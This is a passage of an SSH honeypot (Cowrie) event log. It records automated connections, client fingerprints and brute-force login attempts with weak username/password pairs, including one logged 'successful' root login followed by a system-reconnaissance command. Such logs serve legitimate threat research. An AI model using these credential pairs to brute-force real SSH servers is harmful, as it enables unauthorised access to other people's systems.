{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":40494,"dst_ip":"1.2.3.4","dst_port":22,"session":"845a2588e81d","protocol":"ssh","message":"New connection: 41.226.27.251:40494 (1.2.3.4:22) [session: 845a2588e81d]","sensor":"my-vps","timestamp":"2025-08-31T02:36:14.863457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:36:14.866887Z","src_ip":"41.226.27.251","session":"845a2588e81d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:36:14.911046Z","src_ip":"41.226.27.251","session":"845a2588e81d"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:36:15.045116Z","src_ip":"41.226.27.251","session":"845a2588e81d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40446,"dst_ip":"1.2.3.4","dst_port":22,"session":"daac7ef0cabb","protocol":"ssh","message":"New connection: 212.227.235.229:40446 (1.2.3.4:22) [session: daac7ef0cabb]","sensor":"my-vps","timestamp":"2025-08-31T02:36:15.515046Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:36:16.310547Z","src_ip":"41.226.27.251","session":"845a2588e81d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:36:16.613758Z","src_ip":"212.227.235.229","session":"daac7ef0cabb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:36:16.614450Z","src_ip":"212.227.235.229","session":"daac7ef0cabb"}
{"eventid":"cowrie.session.closed","duration":"36.3","message":"Connection lost after 36.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:36:20.402412Z","src_ip":"212.227.235.229","session":"86ffa5e86ed6"}
{"eventid":"cowrie.login.failed","username":"es","password":"password1","message":"login attempt [es/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:36:22.430780Z","src_ip":"212.227.235.229","session":"daac7ef0cabb"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:36:24.456304Z","src_ip":"212.227.235.229","session":"daac7ef0cabb"}
{"eventid":"cowrie.session.connect","src_ip":"116.198.230.226","src_port":45118,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf6c4007c68b","protocol":"ssh","message":"New connection: 116.198.230.226:45118 (1.2.3.4:22) [session: cf6c4007c68b]","sensor":"my-vps","timestamp":"2025-08-31T02:36:24.530790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:36:24.531665Z","src_ip":"116.198.230.226","session":"cf6c4007c68b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:36:24.727320Z","src_ip":"116.198.230.226","session":"cf6c4007c68b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49842,"dst_ip":"1.2.3.4","dst_port":22,"session":"615bd0094261","protocol":"ssh","message":"New connection: 212.227.125.160:49842 (1.2.3.4:22) [session: 615bd0094261]","sensor":"my-vps","timestamp":"2025-08-31T02:36:25.451595Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":42086,"dst_ip":"1.2.3.4","dst_port":22,"session":"a706a8ae94eb","protocol":"ssh","message":"New connection: 41.226.27.251:42086 (1.2.3.4:22) [session: a706a8ae94eb]","sensor":"my-vps","timestamp":"2025-08-31T02:36:34.875251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:36:34.906105Z","src_ip":"41.226.27.251","session":"a706a8ae94eb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:36:34.932115Z","src_ip":"41.226.27.251","session":"a706a8ae94eb"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:36:35.093545Z","src_ip":"41.226.27.251","session":"a706a8ae94eb"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:36:36.308801Z","src_ip":"41.226.27.251","session":"a706a8ae94eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59180,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbbf47a5612b","protocol":"ssh","message":"New connection: 212.227.125.160:59180 (1.2.3.4:22) [session: bbbf47a5612b]","sensor":"my-vps","timestamp":"2025-08-31T02:36:37.300158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:36:37.815643Z","src_ip":"212.227.125.160","session":"bbbf47a5612b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:36:37.864556Z","src_ip":"212.227.125.160","session":"bbbf47a5612b"}
{"eventid":"cowrie.login.failed","username":"es","password":"password1","message":"login attempt [es/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:36:40.148365Z","src_ip":"212.227.125.160","session":"bbbf47a5612b"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:36:41.507072Z","src_ip":"212.227.125.160","session":"bbbf47a5612b"}
{"eventid":"cowrie.session.closed","duration":"21.0","message":"Connection lost after 21.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:36:46.501905Z","src_ip":"212.227.125.160","session":"615bd0094261"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42502,"dst_ip":"1.2.3.4","dst_port":22,"session":"72e0aa25a65c","protocol":"ssh","message":"New connection: 212.227.235.229:42502 (1.2.3.4:22) [session: 72e0aa25a65c]","sensor":"my-vps","timestamp":"2025-08-31T02:36:52.688046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:36:52.688878Z","src_ip":"212.227.235.229","session":"72e0aa25a65c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T02:36:52.786977Z","src_ip":"212.227.235.229","session":"72e0aa25a65c"}
{"eventid":"cowrie.login.failed","username":"master","password":"master","message":"login attempt [master/master] failed","sensor":"my-vps","timestamp":"2025-08-31T02:36:53.080312Z","src_ip":"212.227.235.229","session":"72e0aa25a65c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:36:54.179806Z","src_ip":"212.227.235.229","session":"72e0aa25a65c"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":60350,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c016ff467f4","protocol":"ssh","message":"New connection: 41.226.27.251:60350 (1.2.3.4:22) [session: 6c016ff467f4]","sensor":"my-vps","timestamp":"2025-08-31T02:36:55.159122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:36:55.225715Z","src_ip":"41.226.27.251","session":"6c016ff467f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:36:55.226466Z","src_ip":"41.226.27.251","session":"6c016ff467f4"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:36:55.421331Z","src_ip":"41.226.27.251","session":"6c016ff467f4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:36:56.629053Z","src_ip":"41.226.27.251","session":"6c016ff467f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36664,"dst_ip":"1.2.3.4","dst_port":22,"session":"861b81945cf6","protocol":"ssh","message":"New connection: 212.227.235.229:36664 (1.2.3.4:22) [session: 861b81945cf6]","sensor":"my-vps","timestamp":"2025-08-31T02:37:08.665114Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54220,"dst_ip":"1.2.3.4","dst_port":22,"session":"930e4246f546","protocol":"ssh","message":"New connection: 212.227.235.229:54220 (1.2.3.4:22) [session: 930e4246f546]","sensor":"my-vps","timestamp":"2025-08-31T02:37:10.353556Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:37:10.561083Z","src_ip":"212.227.235.229","session":"930e4246f546"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":55458,"dst_ip":"1.2.3.4","dst_port":22,"session":"48ab5f235953","protocol":"ssh","message":"New connection: 41.226.27.251:55458 (1.2.3.4:22) [session: 48ab5f235953]","sensor":"my-vps","timestamp":"2025-08-31T02:37:15.387707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:37:15.388784Z","src_ip":"41.226.27.251","session":"48ab5f235953"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:37:15.436114Z","src_ip":"41.226.27.251","session":"48ab5f235953"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:37:15.628011Z","src_ip":"41.226.27.251","session":"48ab5f235953"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:37:15.740371Z","src_ip":"41.226.27.251","session":"48ab5f235953"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:37:15.741139Z","src_ip":"41.226.27.251","session":"48ab5f235953"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:37:15.790813Z","src_ip":"41.226.27.251","session":"48ab5f235953"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:37:15.792113Z","src_ip":"41.226.27.251","session":"48ab5f235953"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49866,"dst_ip":"1.2.3.4","dst_port":22,"session":"695e969608d1","protocol":"ssh","message":"New connection: 212.227.235.229:49866 (1.2.3.4:22) [session: 695e969608d1]","sensor":"my-vps","timestamp":"2025-08-31T02:37:16.462923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:37:16.821850Z","src_ip":"212.227.235.229","session":"861b81945cf6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:37:16.822838Z","src_ip":"212.227.235.229","session":"861b81945cf6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:37:17.200055Z","src_ip":"212.227.235.229","session":"695e969608d1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-